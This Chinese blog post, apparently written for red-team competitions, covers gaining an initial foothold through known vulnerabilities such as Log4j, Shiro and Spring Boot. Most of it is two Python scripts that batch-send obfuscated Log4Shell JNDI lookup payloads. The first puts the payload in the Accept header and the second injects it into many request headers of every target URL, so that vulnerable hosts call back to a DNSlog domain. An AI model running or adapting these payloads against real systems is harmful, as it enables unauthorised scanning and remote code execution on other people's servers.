前言
一场比赛最重要的环节就是外网打点,外网没点进不了内网一切都白瞎,在我的印象中,这几年比较火的漏洞是shiro 550/springboot rce/log4j rce。第一时间肯定要先扫描提供的资产是不是存在上面的漏洞,快速打点。当然各大oa还财务系统也存在各种漏洞。
批量漏洞扫描
log4j
fuzz spring
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
| import requests
import api.read_file
import urllib3
import hashlib
urllib3.disable_warnings()
q = b'icon_hash="116323821" && country="CN"'
url_list = api.read_file.get_url_list('url.txt')
hl = hashlib.md5()
for url in url_list:
hl.update(url.encode(encoding='utf-8'))
print(url + '\t\t' + hl.hexdigest())
dnslog = 'dnslog'
accept = '${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}:// ' + hl.hexdigest()[0:5] + dnslog + '/poc}'
header = {
'Accept': accept
}
try:
r = requests.get(url, headers=header, timeout=5, verify=False)
except requests.exceptions.RequestException as e:
print('请求出现异常')
|
fuzz 全部header
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
| import requests
import api.read_file
import urllib3
import hashlib
urllib3.disable_warnings()
url_list = api.read_file.get_url_list('url.txt')
hl = hashlib.md5()
for url in url_list:
hl.update(url.encode(encoding='utf-8'))
print(url + '\t\t' + hl.hexdigest())
dnslog = 'dnslog'
poc = '${${::-j}${::-n}${::-d}${::-i}: ${::-r}${::-m}${::-i}:// ' + hl.hexdigest()[0:5] + dnslog + '/poc}'
header = {
'Accept': 'accept' + '.' + poc,
'X-Client-IP': 'X-Client-IP' + '.' + poc,
'X-Remote-IP': 'X-Remote-IP' + '.' + poc,
'X-Remote-Addr': 'X-Remote-Addr' + '.' + poc,
'X-Forwarded-For': 'X-Forwarded-For' + '.' + poc,
'X-Originating-IP': 'X-Originating-IP' + '.' + poc,
'User-Agent': 'User-Agent' + '.' + poc,
'Referer': 'Referer' + '.' + poc,
'Authorization': 'Authorization' + '.' + poc
}
try:
r = requests.get(url, headers=header, timeout=5, verify=False)
except requests.exceptions.RequestException as e:
print('请求出现异常')
|
shiro
直接把所有流量走一遍burpsuite或者xray,效率最高。